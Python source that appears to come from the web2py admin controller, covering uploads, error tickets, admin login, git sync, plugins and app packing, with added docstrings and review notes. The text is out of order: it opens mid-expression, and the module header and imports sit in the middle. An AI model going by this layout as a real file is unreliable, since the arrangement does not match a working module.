                                            for f in listfiles(app, dir['name'], regexp=dir['reg'])],
                                          _class="nav nav-list small-font"),
                                       _id=dir['name'] + '_files', _style="display: none;")))
    return dict(result_files=result_files)
def upload_file():
    """Store an uploaded file into the application folder given by
    ``request.vars.location``, normalising the extension per folder kind,
    then redirect back to the sender page."""
    # CSRF guard: state-changing requests must echo the session token
    if request.vars and not request.vars.token == session.token:
        redirect(URL('logout'))
    try:
        filename = None
        app = get_app(name=request.vars.location.split('/')[0])
        path = apath(request.vars.location, r=request)
        if request.vars.filename:
            # sanitize an explicitly provided name
            filename = re.sub('[^\w\./]+', '_', request.vars.filename)
        else:
            filename = os.path.split(request.vars.file.filename)[-1]
        # enforce the extension expected for the destination folder
        if path[-8:] == '/models/' and not filename[-3:] == '.py':
            filename += '.py'
        if path[-9:] == '/modules/' and not filename[-3:] == '.py':
            filename += '.py'
        if path[-13:] == '/controllers/' and not filename[-3:] == '.py':
            filename += '.py'
        if path[-7:] == '/views/' and not filename[-5:] == '.html':
            filename += '.html'
        if path[-11:] == '/languages/' and not filename[-3:] == '.py':
            filename += '.py'
        filename = os.path.join(path, filename)
        dirpath = os.path.dirname(filename)
        if not os.path.exists(dirpath):
            os.makedirs(dirpath)
        data = request.vars.file.file.read()
        lineno = count_lines(data)
        safe_write(filename, data, 'wb')
        log_progress(app, 'UPLOAD', filename, lineno)
        session.flash = T('file "%(filename)s" uploaded',
                          dict(filename=filename[len(path):]))
    except Exception:
        # `filename` may still be None if the failure happened early
        if filename:
            d = dict(filename=filename[len(path):])
        else:
            d = dict(filename='unknown')
        session.flash = T('cannot upload file "%(filename)s"', d)
    redirect(request.vars.sender)
def errors():
    """Error-ticket browser.

    Four listing methods selected by ``request.args(1)``:
    'new'   - group filesystem tickets by traceback hash;
    'dbnew' - same grouping, but tickets stored in the ticket database;
    'dbold' - flat, date-ordered database listing;
    default - flat, mtime-ordered filesystem listing.
    Request vars named ``delete_<hash-or-id>`` delete matching tickets.
    """
    import operator
    import os
    import hashlib
    app = get_app()
    if is_gae:
        # GAE has no local error files; force the database-backed views
        method = 'dbold' if ('old' in
                             (request.args(1) or '')) else 'dbnew'
    else:
        method = request.args(1) or 'new'
    db_ready = {}
    db_ready['status'] = get_ticket_storage(app)
    db_ready['errmessage'] = T(
        "No ticket_storage.txt found under /private folder")
    db_ready['errlink'] = "http://web2py.com/books/default/chapter/29/13#Collecting-tickets"
    if method == 'new':
        errors_path = apath('%s/errors' % app, r=request)
        delete_hashes = []
        for item in request.vars:
            if item[:7] == 'delete_':
                delete_hashes.append(item[7:])
        hash2error = dict()
        for fn in listdir(errors_path, '^[a-fA-F0-9.\-]+$'):
            fullpath = os.path.join(errors_path, fn)
            if not os.path.isfile(fullpath):
                continue
            try:
                fullpath_file = safe_open(fullpath, 'rb')
                try:
                    error = pickle.load(fullpath_file)
                finally:
                    fullpath_file.close()
            except IOError:
                continue
            except EOFError:
                continue
            # identical tracebacks collapse into one entry keyed by md5
            hash = hashlib.md5(to_bytes(error['traceback'])).hexdigest()
            if hash in delete_hashes:
                os.unlink(fullpath)
            else:
                try:
                    hash2error[hash]['count'] += 1
                except KeyError:
                    error_lines = error['traceback'].split("\n")
                    last_line = error_lines[-2] if len(error_lines) > 1 else 'unknown'
                    error_causer = os.path.split(error['layer'])[1]
                    hash2error[hash] = dict(count=1, pickel=error,
                                            causer=error_causer,
                                            last_line=last_line,
                                            hash=hash, ticket=fn)
        # most frequent errors first
        decorated = [(x['count'], x) for x in hash2error.values()]
        decorated.sort(key=operator.itemgetter(0), reverse=True)
        return dict(errors=[x[1] for x in decorated], app=app, method=method, db_ready=db_ready)
    elif method == 'dbnew':
        errors_path = apath('%s/errors' % app, r=request)
        tk_db, tk_table = get_ticket_storage(app)
        delete_hashes = []
        for item in request.vars:
            if item[:7] == 'delete_':
                delete_hashes.append(item[7:])
        hash2error = dict()
        for fn in tk_db(tk_table.id > 0).select():
            try:
                error = pickle.loads(fn.ticket_data)
                hash = hashlib.md5(error['traceback']).hexdigest()
                if hash in delete_hashes:
                    tk_db(tk_table.id == fn.id).delete()
                    tk_db.commit()
                else:
                    try:
                        hash2error[hash]['count'] += 1
                    except KeyError:
                        error_lines = error['traceback'].split("\n")
                        last_line = error_lines[-2]
                        error_causer = os.path.split(error['layer'])[1]
                        hash2error[hash] = dict(count=1,
                                                pickel=error, causer=error_causer,
                                                last_line=last_line, hash=hash,
                                                ticket=fn.ticket_id)
            except AttributeError as e:
                # unreadable/stale row: drop it
                tk_db(tk_table.id == fn.id).delete()
                tk_db.commit()
        decorated = [(x['count'], x) for x in hash2error.values()]
        decorated.sort(key=operator.itemgetter(0), reverse=True)
        return dict(errors=[x[1] for x in decorated], app=app,
                    method=method, db_ready=db_ready)
    elif method == 'dbold':
        tk_db, tk_table = get_ticket_storage(app)
        for item in request.vars:
            if item[:7] == 'delete_':
                tk_db(tk_table.ticket_id == item[7:]).delete()
                tk_db.commit()
        tickets_ = tk_db(tk_table.id > 0).select(tk_table.ticket_id,
                                                 tk_table.created_datetime,
                                                 orderby=~tk_table.created_datetime)
        tickets = [row.ticket_id for row in tickets_]
        times = dict([(row.ticket_id, row.created_datetime) for
                      row in tickets_])
        return dict(app=app, tickets=tickets, method=method,
                    times=times, db_ready=db_ready)
    else:
        for item in request.vars:
            # delete_all rows doesn't contain any ticket
            # Remove anything else as requested
            # NOTE(review): the literal "delete_all}" (trailing brace) looks
            # suspicious — verify against the form field name it matches.
            if item[:7] == 'delete_' and (not item == "delete_all}"):
                os.unlink(apath('%s/errors/%s' % (app, item[7:]), r=request))
        func = lambda p: os.stat(apath('%s/errors/%s' %
                                       (app, p), r=request)).st_mtime
        tickets = sorted(
            listdir(apath('%s/errors/' % app, r=request), '^\w.*'),
            key=func,
            reverse=True)
        return dict(app=app, tickets=tickets, method=method, db_ready=db_ready)
def get_ticket_storage(app):
    """Open (and lazily create) the database-backed ticket storage for *app*.

    The connection string comes from ``private/ticket_storage.txt``; on GAE
    the Datastore is used as a fallback.  Returns ``(db, table)`` on
    success, or ``False`` when no database storage is configured.
    """
    private_folder = apath('%s/private' % app, r=request)
    ticket_file = os.path.join(private_folder, 'ticket_storage.txt')
    if os.path.exists(ticket_file):
        db_string = safe_read(ticket_file)
        db_string = db_string.strip().replace('\r', '').replace('\n', '')
    elif is_gae:
        # use Datastore as fallback if there is no ticket_file
        db_string = "google:datastore"
    else:
        return False
    tickets_table = 'web2py_ticket'
    tablename = tickets_table + '_' + app
    db_path = apath('%s/databases' % app, r=request)
    ticketsdb = DAL(db_string, folder=db_path, auto_import=True)
    if not ticketsdb.get(tablename):
        # first use: create the per-application ticket table
        table = ticketsdb.define_table(
            tablename,
            Field('ticket_id', length=100),
            Field('ticket_data', 'text'),
            Field('created_datetime', 'datetime'),
        )
    return ticketsdb, ticketsdb.get(tablename)
def make_link(path):
    """Turn an absolute path of an editable application file into an HTML
    edit link.

    Only existing files under the current app's controllers/models/views
    folders (with the matching extension) produce a link; anything else
    returns the empty string.
    """
    tryFile = path.replace('\\', '/')
    if os.path.isabs(tryFile) and os.path.isfile(tryFile):
        (folder, filename) = os.path.split(tryFile)
        (base, ext) = os.path.splitext(filename)
        app = get_app()
        editable = {'controllers': '.py', 'models': '.py', 'views': '.html'}
        for key in editable.keys():
            check_extension = folder.endswith("%s/%s" % (app, key))
            if ext.lower() == editable[key] and check_extension:
                # the link text keeps the surrounding quotes of the traceback
                return to_native(A('"' + tryFile + '"',
                                   _href=URL(r=request,
                                             f='edit/%s/%s/%s' % (app, key, filename))).xml())
    return ''
def make_links(traceback):
    """Rewrite *traceback*, replacing quoted file paths with edit links
    (via :func:`make_link`) where the path is recognised as editable."""
    pieces = traceback.split('"')
    # pieces alternate: text, quoted-content, text, quoted-content, ...
    out = pieces[0] if pieces[0] else ''
    idx = 1
    while idx < len(pieces):
        link = make_link(pieces[idx])
        if link == '':
            # not an editable file: restore the original quoting
            out += '"' + pieces[idx]
        else:
            out += link
        if idx + 1 < len(pieces):
            out += pieces[idx + 1]
        idx += 2
    return out
class TRACEBACK(object):
    """Wrap a traceback string as an XML-able helper whose file paths are
    rendered as edit links (see :func:`make_links`)."""
    def __init__(self, text):
        """Highlight *text* with the CODE helper and linkify its paths."""
        self.s = make_links(CODE(text).xml())
    def xml(self):
        """Return the pre-rendered XML string (gluon helper protocol)."""
        return self.s
def ticket():
    """Display one filesystem-stored error ticket.

    Expects ``request.args == [app, ticket_id]``; loads the ticket via
    RestrictedError and hands its parts to the view.
    """
    if len(request.args) != 2:
        session.flash = T('invalid ticket')
        redirect(URL('site'))
    app = get_app()
    myversion = request.env.web2py_version
    ticket = request.args[1]
    e = RestrictedError()
    e.load(request, app, ticket)
    return dict(app=app,
                ticket=ticket,
                output=e.output,
                traceback=(e.traceback and TRACEBACK(e.traceback)),
                snapshot=e.snapshot,
                code=e.code,
                layer=e.layer,
                myversion=myversion)
def ticketdb():
    """Display one database-stored error ticket.

    Like :func:`ticket`, but points RestrictedError at the ticket storage
    database and reuses the default/ticket.html view.
    """
    if len(request.args) != 2:
        session.flash = T('invalid ticket')
        redirect(URL('site'))
    app = get_app()
    myversion = request.env.web2py_version
    ticket = request.args[1]
    e = RestrictedError()
    # tell RestrictedError.load to read from the ticket database
    request.tickets_db = get_ticket_storage(app)[0]
    e.load(request, app, ticket)
    response.view = 'default/ticket.html'
    return dict(app=app,
                ticket=ticket,
                output=e.output,
                traceback=(e.traceback and TRACEBACK(e.traceback)),
                snapshot=e.snapshot,
                code=e.code,
                layer=e.layer,
                myversion=myversion)
def error():
    """Deliberately raise an exception so a ticket is generated (for testing)."""
    raise RuntimeError('admin ticket generator at your service')
def update_languages():
    """Re-scan the application's sources and refresh its language files
    (static translation strings), then return to the design page."""
    app = get_app()
    update_all_languages(apath(app, r=request))
    session.flash = T('Language files (static strings) updated')
    redirect(URL('design', args=app, anchor='languages'))
def user():
    """Auth endpoint for multi-user mode; otherwise report login as disabled."""
    if not MULTI_USER_MODE:
        return dict(form=T("Disabled"))
    # the very first registered user is auto-approved so the site
    # can be bootstrapped
    if not db(db.auth_user).count():
        auth.settings.registration_requires_approval = False
    return dict(form=auth())
def reload_routes():
    """Reload routes.py (URL rewrite rules) and return to the site page."""
    gluon.rewrite.load()
    redirect(URL('site'))
def manage_students():
    """Manager-only grid over auth_user for approving/managing students.

    Returns ``locals()`` — the view relies on the local names defined here
    (notably ``grid``), so do not rename them.
    """
    if not (MULTI_USER_MODE and is_manager()):
        session.flash = T('Not Authorized')
        redirect(URL('site'))
    # allow the manager to edit the registration/approval key in the grid
    db.auth_user.registration_key.writable = True
    grid = SQLFORM.grid(db.auth_user)
    return locals()
def bulk_register():
    """Manager-only bulk user registration: one email address per line.

    Returns ``locals()`` — the view relies on the local names defined here
    (notably ``form``), so do not rename them.
    """
    if not (MULTI_USER_MODE and is_manager()):
        session.flash = T('Not Authorized')
        redirect(URL('site'))
    form = SQLFORM.factory(Field('emails', 'text'))
    if form.process().accepted:
        emails = [x.strip() for x in form.vars.emails.split('\n') if x.strip()]
        n = 0
        for email in emails:
            # skip addresses that already have an account
            if not db.auth_user(email=email):
                n += db.auth_user.insert(email=email) and 1 or 0
        session.flash = T('%s students registered', n)
        redirect(URL('site'))
    return locals()
# Begin experimental stuff need fixes:
# 1) should run in its own process - cannot os.chdir
# 2) should not prompt user at console
# 3) should give option to force commit and not require manual merge
def git_pull():
    """Update an application from its git remote (fetch + pull).

    Shows a confirmation dialog first; each git failure mode gets its own
    flash message and redirects back to the site page.
    """
    app = get_app()
    if not have_git:
        session.flash = GIT_MISSING
        redirect(URL('site'))
    dialog = FORM.confirm(T('Pull'),
                          {T('Cancel'): URL('site')})
    if dialog.accepted:
        try:
            repo = git.Repo(os.path.join(apath(r=request), app))
            origin = repo.remotes.origin
            origin.fetch()
            origin.pull()
            session.flash = T("Application updated via git pull")
            redirect(URL('site'))
        except git.CheckoutError:
            session.flash = T("Pull failed, certain files could not be checked out. Check logs for details.")
            redirect(URL('site'))
        except git.UnmergedEntriesError:
            session.flash = T("Pull is not possible because you have unmerged files. Fix them up in the work tree, and then try again.")
            redirect(URL('site'))
        except git.GitCommandError:
            session.flash = T(
                "Pull failed, git exited abnormally. See logs for details.")
            redirect(URL('site'))
        except AssertionError:
            session.flash = T("Pull is not possible because you have unmerged files. Fix them up in the work tree, and then try again.")
            redirect(URL('site'))
    elif 'cancel' in request.vars:
        redirect(URL('site'))
    return dict(app=app, dialog=dialog)
def git_push():
    """Commit all application changes and push them to the git remote.

    A changelog message is required; on unmerged entries the push is
    aborted with an explanatory flash.
    """
    app = get_app()
    if not have_git:
        session.flash = GIT_MISSING
        redirect(URL('site'))
    form = SQLFORM.factory(Field('changelog', requires=IS_NOT_EMPTY()))
    form.element('input[type=submit]')['_value'] = T('Push')
    form.add_button(T('Cancel'), URL('site'))
    form.process()
    if form.accepted:
        try:
            repo = git.Repo(os.path.join(apath(r=request), app))
            index = repo.index
            # stage everything under the application folder
            index.add([apath(r=request) + app + '/*'])
            new_commit = index.commit(form.vars.changelog)
            origin = repo.remotes.origin
            origin.push()
            session.flash = T(
                "Git repo updated with latest application changes.")
            redirect(URL('site'))
        except git.UnmergedEntriesError:
            session.flash = T("Push failed, there are unmerged entries in the cache. Resolve merge issues manually and try again.")
            redirect(URL('site'))
    return dict(app=app, form=form)
def plugins():
    """List installable plugins fetched from web2pyslices.com.

    The downloaded JSON is cached in the session; on download failure a
    warning is flashed and the cache stays empty so the next request
    retries.

    Fixes vs. previous revision: the bare ``except:`` is narrowed to
    ``except Exception:`` (no longer swallows SystemExit/KeyboardInterrupt),
    and the failure path no longer crashes on ``[]["results"]``.
    """
    app = request.args(0)
    from gluon.serializers import loads_json
    if not session.plugins:
        try:
            rawlist = urlopen("http://www.web2pyslices.com/" +
                              "public/api.json/action/list/content/Package?package" +
                              "_type=plugin&search_index=false").read()
            session.plugins = loads_json(rawlist)
        except Exception:
            # network/JSON failure: leave the cache falsy so we retry later
            response.flash = T('Unable to download the list of plugins')
            session.plugins = []
    # guard the failure path above, where session.plugins is []
    results = session.plugins["results"] if session.plugins else []
    return dict(plugins=results, app=request.args(0))
def install_plugin():
    """Download and install a plugin pack (.w2p) into an application.

    ``request.vars.source`` must be an http/https URL; the plugin name is
    derived from the URL when it embeds ``web2py.plugin.<name>.w2p``,
    otherwise from ``request.vars.plugin``.
    """
    app = request.args(0)
    source = request.vars.source
    plugin = request.vars.plugin
    if not (source and app):
        raise HTTP(500, T("Invalid request"))
    # make sure no XSS attacks in source
    # (only plain http/https URLs are accepted as download sources)
    if not source.lower().split('://')[0] in ('http','https'):
        raise HTTP(500, T("Invalid request"))
    form = SQLFORM.factory()
    result = None
    if form.process().accepted:
        # get w2p plugin
        if "web2py.plugin." in source:
            filename = "web2py.plugin.%s.w2p" % \
                source.split("web2py.plugin.")[-1].split(".w2p")[0]
        else:
            filename = "web2py.plugin.%s.w2p" % cleanpath(plugin)
        if plugin_install(app, urlopen(source),
                          request, filename):
            session.flash = T('New plugin installed: %s', filename)
        else:
            session.flash = \
                T('unable to install plugin "%s"', filename)
        redirect(URL(f="plugins", args=[app, ]))
    return dict(form=form, app=app, plugin=plugin, source=source)
# -*- coding: utf-8 -*-
# Admin UI feature switches
EXPERIMENTAL_STUFF = True  # enables the mobile view variant below
MAXNFILES = 1000  # cap on entries returned by static-folder scans
if EXPERIMENTAL_STUFF:
    if is_mobile:
        # serve the mobile-specific templates for mobile user agents
        response.view = response.view.replace('default/', 'default.mobile/')
        response.menu = []
import re
from gluon.admin import *
from gluon.fileutils import abspath, read_file, write_file
from gluon.utils import web2py_uuid
from gluon.tools import Config, prevent_open_redirect
from gluon.compileapp import find_exposed_functions
from glob import glob
from gluon._compat import iteritems, PY2, pickle, xrange, urlopen, to_bytes, StringIO, to_native, reload
import gluon.rewrite
import shutil
import platform
# Optional GitPython support: git_pull/git_push are disabled when the
# module is missing or too old.
try:
    import git
    if git.__version__ < '0.3.1':
        raise ImportError("Your version of git is %s. Upgrade to 0.3.1 or better." % git.__version__)
    have_git = True
except ImportError as e:
    have_git = False
    GIT_MISSING = 'Requires gitpython module, but not installed or incompatible version: %s' % e
from gluon.languages import (read_possible_languages, read_dict, write_dict,
                             read_plural_dict, write_plural_dict)
# Request guards: reject actions that are disabled in the current mode
# before any controller function runs.
if DEMO_MODE and request.function in ['change_password', 'pack',
    'pack_custom', 'pack_plugin', 'upgrade_web2py', 'uninstall',
    'cleanup', 'compile_app', 'remove_compiled_app', 'delete',
    'delete_plugin', 'create_file', 'upload_file', 'update_languages',
    'reload_routes', 'git_push', 'git_pull', 'install_plugin']:
    session.flash = T('disabled in demo mode')
    redirect(URL('site'))
if is_gae and request.function in ('edit', 'edit_language',
    'edit_plurals', 'update_languages', 'create_file', 'install_plugin'):
    session.flash = T('disabled in GAE mode')
    redirect(URL('site'))
if not is_manager() and request.function in ['change_password', 'upgrade_web2py']:
    session.flash = T('disabled in multi user mode')
    redirect(URL('site'))
if FILTER_APPS and request.args(0) and not request.args(0) in FILTER_APPS:
    session.flash = T('disabled in demo mode')
    redirect(URL('site'))
# per-session CSRF token used by the state-changing handlers
if not session.token:
    session.token = web2py_uuid()
def count_lines(data):
    """Count the effective source lines in *data*: non-blank lines whose
    first character is not '#' (indented comments still count)."""
    total = 0
    for raw_line in data.split('\n'):
        if raw_line.strip() and not raw_line.startswith('#'):
            total += 1
    return total
def log_progress(app, mode='EDIT', filename=None, progress=0):
    """Append an entry to the application's ``progress.log`` audit file.

    Args:
        app: application name (folder under applications/).
        mode: action being logged, e.g. 'EDIT', 'CREATE', 'UPLOAD'.
        filename: file the action touched; nothing is logged when falsy.
        progress: metric recorded with the entry (e.g. a line count).

    Fix vs. previous revision: file handles returned by safe_open are now
    explicitly closed instead of being leaked.
    """
    progress_file = os.path.join(apath(app, r=request), 'progress.log')
    now = str(request.now)[:19]
    if not os.path.exists(progress_file):
        # first entry ever: create the log with a START marker
        fh = safe_open(progress_file, 'w')
        try:
            fh.write('[%s] START\n' % now)
        finally:
            fh.close()
    if filename:
        fh = safe_open(progress_file, 'a')
        try:
            fh.write(
                '[%s] %s %s: %s\n' % (now, mode, filename, progress))
        finally:
            fh.close()
def safe_open(a, b):
    """Open file *a* with mode *b*, but return a write-discarding dummy
    when running in DEMO_MODE or on GAE (so admin actions cannot modify
    files there)."""
    if (DEMO_MODE or is_gae) and ('w' in b or 'a' in b):
        # dummy object with the minimal file interface used by callers
        class tmp:
            def write(self, data):
                pass
            def close(self):
                pass
        return tmp()
    if PY2 or 'b' in b:
        return open(a, b)
    else:
        # Python 3 text mode: force utf8 regardless of locale
        return open(a, b, encoding="utf8")
def safe_read(a, b='r'):
    """Read and return the full contents of file *a* (mode *b*),
    guaranteeing the handle is closed."""
    handle = safe_open(a, b)
    try:
        contents = handle.read()
    finally:
        handle.close()
    return contents
def safe_write(a, value, b='w'):
    """Write *value* to file *a* (mode *b*), guaranteeing the handle is
    closed even if the write fails."""
    handle = safe_open(a, b)
    try:
        handle.write(value)
    finally:
        handle.close()
def get_app(name=None):
    """Return the requested application name after authorization checks.

    Uses *name* or ``request.args(0)``.  The app must exist on disk and,
    in multi-user mode, be owned by the current user (managers bypass the
    ownership check).  Redirects to the site page otherwise.
    """
    app = name or request.args(0)
    if (app and os.path.exists(apath(app, r=request)) and
        (not MULTI_USER_MODE or is_manager() or
         db(db.app.name == app)(db.app.owner == auth.user.id).count())):
        return app
    session.flash = T('App does not exist or you are not authorized')
    redirect(URL('site'))
def index():
    """Admin login page handler.

    Validates the admin password, throttles brute-force attempts with an
    exponential sleep + HTTP 403 lockout, and redirects to the (sanitised)
    ``send`` target on success.
    """
    # sanitised to block open-redirect attacks via ?send=
    send = prevent_open_redirect(request.vars.send)
    if DEMO_MODE:
        session.authorized = True
        session.last_time = t0
    if not send:
        send = URL('site')
    if session.authorized:
        redirect(send)
    elif failed_login_count() >= allowed_number_of_attempts:
        # lockout: stall the client, then refuse
        time.sleep(2 ** allowed_number_of_attempts)
        raise HTTP(403)
    elif request.vars.password:
        # cap password length to bound hashing cost
        if verify_password(request.vars.password[:1024]):
            session.authorized = True
            login_record(True)
            if CHECK_VERSION:
                session.check_version = True
            else:
                session.check_version = False
            session.last_time = t0
            if isinstance(send, list):  # ## why does this happen?
                send = str(send[0])
            redirect(send)
        else:
            times_denied = login_record(False)
            if times_denied >= allowed_number_of_attempts:
                response.flash = \
                    T('admin disabled because too many invalid login attempts')
            elif times_denied == allowed_number_of_attempts - 1:
                response.flash = \
                    T('You have one more login attempt before you are locked out')
            else:
                response.flash = T('invalid password.')
    return dict(send=send)
def check_version():
    """Check whether web2py is up to date and return a suitable HTML widget
    (link, status text, or upgrade button)."""
    # release the session so this slow network check does not block others
    session.forget()
    session._unlock(response)
    new_version, version = check_new_version(request.env.web2py_version,
                                             WEB2PY_VERSION_URL)
    if new_version in (-1, -2):
        # -1/-2 signal that the version check itself failed
        return A(T('Unable to check for upgrades'), _href=WEB2PY_URL)
    elif not new_version:
        return A(T('web2py is up to date'), _href=WEB2PY_URL)
    elif platform.system().lower() in ('windows', 'win32', 'win64') and os.path.exists("web2py.exe"):
        # binary Windows distribution cannot self-upgrade
        return SPAN('You should upgrade to %s' % version.split('(')[0])
    else:
        return sp_button(URL('upgrade_web2py'), T('upgrade now to %s') % version.split('(')[0])
def logout():
    """Clear the admin authorization flag and redirect to the login page
    (or to the auth logout in multi-user mode)."""
    session.authorized = None
    if MULTI_USER_MODE:
        redirect(URL('user/logout'))
    redirect(URL('index'))
def change_password():
    """Change the admin password, writing the new hash into the per-port
    ``parameters_<port>.py`` file.  Not available for PAM-authenticated
    users."""
    if session.pam_user:
        session.flash = T(
            'PAM authenticated user, cannot change password here')
        redirect(URL('site'))
    form = SQLFORM.factory(Field('current_admin_password', 'password'),
                           Field('new_admin_password',
                                 'password', requires=IS_STRONG()),
                           Field('new_admin_password_again', 'password'),
                           _class="span4 well")
    if form.accepts(request.vars):
        if not verify_password(request.vars.current_admin_password):
            form.errors.current_admin_password = T('invalid password')
        elif form.vars.new_admin_password != form.vars.new_admin_password_again:
            form.errors.new_admin_password_again = T('no match')
        else:
            # persist the CRYPT hash, not the plaintext password
            path = abspath('parameters_%s.py' % request.env.server_port)
            safe_write(path, 'password="%s"' % CRYPT()(
                request.vars.new_admin_password)[0])
            session.flash = T('password changed')
            redirect(URL('site'))
    return dict(form=form)
def site():
    """ Site handler: lists applications and processes the
    create / upload / git-import forms. """
    myversion = request.env.web2py_version
    # Shortcut to make the elif statements more legible
    file_or_appurl = 'file' in request.vars or 'appurl' in request.vars
    class IS_VALID_APPNAME(object):
        # Validator: name must match \w+ and, unless 'overwrite' was
        # requested, must not collide with an existing application.
        def __call__(self, value):
            if not re.compile('^\w+$').match(value):
                return (value, T('Invalid application name'))
            if not request.vars.overwrite and \
                    os.path.exists(os.path.join(apath(r=request), value)):
                return (value, T('Application exists already'))
            return (value, None)
    is_appname = IS_VALID_APPNAME()
    form_create = SQLFORM.factory(Field('name', requires=is_appname),
                                  table_name='appcreate')
    form_update = SQLFORM.factory(Field('name', requires=is_appname),
                                  Field('file', 'upload', uploadfield=False),
                                  Field('url'),
                                  Field('overwrite', 'boolean'),
                                  table_name='appupdate')
    form_create.process()
    form_update.process()
    if DEMO_MODE:
        # demo mode is read-only: ignore both forms
        pass
    elif form_create.accepted:
        # create a new application
        appname = cleanpath(form_create.vars.name)
        created, error = app_create(appname, request, info=True)
        if created:
            if MULTI_USER_MODE:
                db.app.insert(name=appname, owner=auth.user.id)
            log_progress(appname)
            session.flash = T('new application "%s" created', appname)
            gluon.rewrite.load()
            redirect(URL('design', args=appname))
        else:
            session.flash = \
                DIV(T('unable to create application "%s"', appname),
                    PRE(error))
            redirect(URL(r=request))
    elif form_update.accepted:
        if (form_update.vars.url or '').endswith('.git'):
            # import an application by cloning a git repository
            if not have_git:
                session.flash = GIT_MISSING
                redirect(URL(r=request))
            target = os.path.join(apath(r=request), form_update.vars.name)
            try:
                new_repo = git.Repo.clone_from(form_update.vars.url, target)
                session.flash = T('new application "%s" imported',
                                  form_update.vars.name)
                gluon.rewrite.load()
            except git.GitCommandError as err:
                session.flash = T('Invalid git repository specified.')
            redirect(URL(r=request))
        elif form_update.vars.url:
            # fetch an application via URL or file upload
            try:
                f = urlopen(form_update.vars.url)
                if f.code == 404:
                    raise Exception("404 file not found")
            except Exception as e:
                session.flash = \
                    DIV(T('Unable to download app because:'), PRE(repr(e)))
                redirect(URL(r=request))
            fname = form_update.vars.url
        elif form_update.accepted and form_update.vars.file:
            fname = request.vars.file.filename
            f = request.vars.file.file
        else:
            session.flash = 'No file uploaded and no URL specified'
            redirect(URL(r=request))
        if f:
            appname = cleanpath(form_update.vars.name)
            installed = app_install(appname, f,
                                    request, fname,
                                    overwrite=form_update.vars.overwrite)
        if f and installed:
            msg = 'application %(appname)s installed with md5sum: %(digest)s'
            if MULTI_USER_MODE:
                db.app.insert(name=appname, owner=auth.user.id)
            log_progress(appname)
            session.flash = T(msg, dict(appname=appname,
                                        digest=md5_hash(installed)))
            gluon.rewrite.load()
        else:
            msg = 'unable to install application "%(appname)s"'
            session.flash = T(msg, dict(appname=form_update.vars.name))
        redirect(URL(r=request))
    regex = re.compile('^\w+$')
    if is_manager():
        # managers see every application folder
        apps = [a for a in os.listdir(apath(r=request)) if regex.match(a) and
                a != '__pycache__']
    else:
        # non-managers only see applications they own
        apps = [a.name for a in db(db.app.owner == auth.user_id).select()]
    if FILTER_APPS:
        apps = [a for a in apps if a in FILTER_APPS]
    apps = sorted(apps, key=lambda a: a.upper())
    myplatform = platform.python_version()
    return dict(app=None, apps=apps, myversion=myversion, myplatform=myplatform,
                form_create=form_create, form_update=form_update)
def report_progress(app):
    """Build a cumulative line-count history for *app*.

    Parses the app's ``progress.log`` (entries look like
    ``[timestamp] ACTION filename: delta``) and returns a list of
    ``[days_ago, cumulative_count]`` pairs relative to ``request.now``.
    Returns an empty list when no log exists.
    """
    import datetime
    progress_file = os.path.join(apath(app, r=request), 'progress.log')
    # Raw string: '\[' etc. are invalid escape sequences in plain literals.
    regex = re.compile(r'\[(.*?)\][^\:]+\:\s+(\-?\d+)')
    if not os.path.exists(progress_file):
        return []
    # Close the log deterministically (the original leaked the handle).
    with open(progress_file, 'r') as logf:
        matches = regex.findall(logf.read())
    events, counter = [], 0
    for m in matches:
        if not m:
            continue
        days = -(request.now - datetime.datetime.strptime(m[0],
                                                          '%Y-%m-%d %H:%M:%S')).days
        counter += int(m[1])
        events.append([days, counter])
    return events
def pack():
    """Pack an application into a .w2p archive and stream it back.

    A second request arg selects the compiled-pack variant.
    """
    app = get_app()
    packed = None
    try:
        if len(request.args) == 1:
            fname = 'web2py.app.%s.w2p' % app
            packed = app_pack(app, request, raise_ex=True)
        else:
            fname = 'web2py.app.%s.compiled.w2p' % app
            packed = app_pack_compiled(app, request, raise_ex=True)
    except Exception as e:
        pferror = e
        packed = None
    if not packed:
        session.flash = T('internal error: %s', pferror)
        redirect(URL('site'))
    # Stream the archive as a download.
    response.headers['Content-Type'] = 'application/w2p'
    disposition = 'attachment; filename=%s' % fname
    response.headers['Content-Disposition'] = disposition
    return safe_read(packed, 'rb')
def pack_plugin():
    """Pack one plugin of an application into a .w2p archive.

    Expects ``request.args == [app, plugin_name]``. Streams the packed
    plugin back, or flashes an internal error and redirects.
    """
    app = get_app()
    # Guard: previously `filename` stayed unbound (NameError) whenever
    # request.args did not have exactly two elements.
    filename = None
    if len(request.args) == 2:
        fname = 'web2py.plugin.%s.w2p' % request.args[1]
        filename = plugin_pack(app, request.args[1], request)
    if filename:
        response.headers['Content-Type'] = 'application/w2p'
        disposition = 'attachment; filename=%s' % fname
        response.headers['Content-Disposition'] = disposition
        return safe_read(filename, 'rb')
    else:
        session.flash = T('internal error')
        redirect(URL('plugin', args=request.args))
def pack_exe(app, base, filenames=None):
    """Bundle *app* into a ready-to-run web2py Windows distribution.

    Downloads the latest web2py_win.zip, injects a routes.py that makes
    *app* the default application, copies the selected files from
    *base* into the archive, and streams the zip to the client.

    Args:
        app: application name.
        base: absolute path of the application folder.
        filenames: iterable of paths relative to *base* to include.
    """
    import urllib
    import zipfile
    # Download latest web2py_win and open it with zipfile
    download_url = 'http://www.web2py.com/examples/static/web2py_win.zip'
    out = StringIO()
    # NOTE(review): urlopen().read() returns bytes; this assumes the
    # StringIO in scope accepts bytes (true for cStringIO on PY2) —
    # verify behavior under Python 3.
    out.write(urlopen(download_url).read())
    web2py_win = zipfile.ZipFile(out, mode='a')
    # Write routes.py with the application as default
    routes = u'# -*- coding: utf-8 -*-\nrouters = dict(BASE=dict(default_application="%s"))' % app
    web2py_win.writestr('web2py/routes.py', routes.encode('utf-8'))
    # Copy the application into the zipfile
    common_root = os.path.dirname(base)
    for filename in filenames:
        fname = os.path.join(base, filename)
        arcname = os.path.join('web2py/applications', app, filename)
        web2py_win.write(fname, arcname)
    web2py_win.close()
    # Stream the finished archive back as a download.
    response.headers['Content-Type'] = 'application/zip'
    response.headers['Content-Disposition'] = 'attachment; filename=web2py.app.%s.zip' % app
    out.seek(0)
    return response.stream(out)
def pack_custom():
    """Pack a user-selected subset of an application's files.

    GET renders the file-tree selection form (via ``locals()``); POST
    packs the chosen files either as a .w2p archive or, when ``doexe``
    is set, as a Windows bundle via :func:`pack_exe`.
    """
    app = get_app()
    base = apath(app, r=request)

    def ignore(fs):
        # Skip hidden (#...), editor-backup (~) and .bak entries.
        return [f for f in fs if not (
            f[:1] in '#' or f.endswith('~') or f.endswith('.bak'))]
    files = {}
    for (r, d, f) in os.walk(base):
        files[r] = {'folders': ignore(d), 'files': ignore(f)}
    if request.post_vars.file:
